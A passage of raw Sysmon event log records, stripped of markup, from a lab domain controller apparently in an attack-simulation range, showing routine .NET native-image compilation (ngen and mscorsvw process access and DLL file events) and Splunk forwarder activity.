21:01:24.013{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.810{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.795{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.795{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.545{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.482{4DB9351A-A125-60D3-9B02-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SYOQN7FWVU\System.ServiceModel.ServiceMoniker40.ni.dll.auxMD5=F7D2DA09880009CEE209A5E6132DC95A,SHA256=1F19BB77CFD7D0BA0365D2A19DB333943FEE1915A932E8E44FA2081D7D7C26BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.467{4DB9351A-A125-60D3-9B02-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SYOQN7FWVU\System.ServiceModel.ServiceMoniker40.ni.dllMD5=9C3B7229DE892683DBBDCDDEB5504A91,SHA256=81DED4C7957EE9B782B68DDCD48344A04ADE00CC8D6FE2EAD1C7F24011139987,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:25.467{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c34-0\System.ServiceModel.ServiceMoniker40.dll2021-06-23 21:01:25.467 10341000x800000000000000019055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.404{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.389{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.389{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.295{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.217{4DB9351A-A124-60D3-9902-00000000CF01}6496NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3DXV08NAXP\System.ServiceModel.Routing.ni.dll.auxMD5=5B74D3B5B6CF28167CB5B5DB782F2F04,SHA256=9D27FAF0F2F8B4D262A8F93AA1E4AC1056E97C865650ADB9B03C62D44BAF2D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.217{4DB9351A-A124-60D3-9902-00000000CF01}6496NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3DXV08NAXP\System.ServiceModel.Routing.ni.dllMD5=E985EAF11F8A3E299BE07A6432BA5ED9,SHA256=242EAF7F1091B190ADCAABD139305B55874E9EE3A077C9CED6C215D04B0CBD29,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:25.185{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1960-0\System.ServiceModel.Routing.dll2021-06-23 21:01:25.185 23542300x800000000000000019046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B59624244A9A41DD92B9D7CBF088A30,SHA256=408D4821A7BFA504DFAAC61AE147CED7A691174AF3E3911FE200649F2A260D22,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.254{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61370-false10.0.1.12-8000- 23542300x800000000000000019067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B3564D82C12574DF176791531653150,SHA256=D8F64918D9CB4EB43F33A4539EA0D86E064F3E2B527B96F10A99D0CBE9EBA721,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.123{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3362F23C02546713C7A6463466A2900,SHA256=AB85E57E63003ACE25046607D1D28230085427ADD7F40421C4B615D6511F16F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.092{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=995D70667FAEDD4D62AC8349DFFD80AD,SHA256=4CF96CBEA7A392090C4CFAD4488929835428B273E1632ACC933EAB8C836E478B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.701{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.545{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000019069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:27.420{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a20-0\System.ServiceModel.Web.dll2021-06-23 21:01:27.420 23542300x800000000000000019068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.154{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9690E4B4A571DF815994BDB1CA5FE6,SHA256=BDA0D8ACD25D12B4F56FD4672801A0B0E7580EE395DDDD4DA2C2720824C7B790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.920{4DB9351A-A127-60D3-9F02-00000000CF01}6968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CXT5AL39J0\System.Speech.ni.dll.auxMD5=E6E3B69558422B846620014F4B4BDEF9,SHA256=D9BB2FD2E5905509168777C231A579DFAB24E1A8E1E4F7FBBAA4A2357574DB5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.920{4DB9351A-A127-60D3-9F02-00000000CF01}6968NT 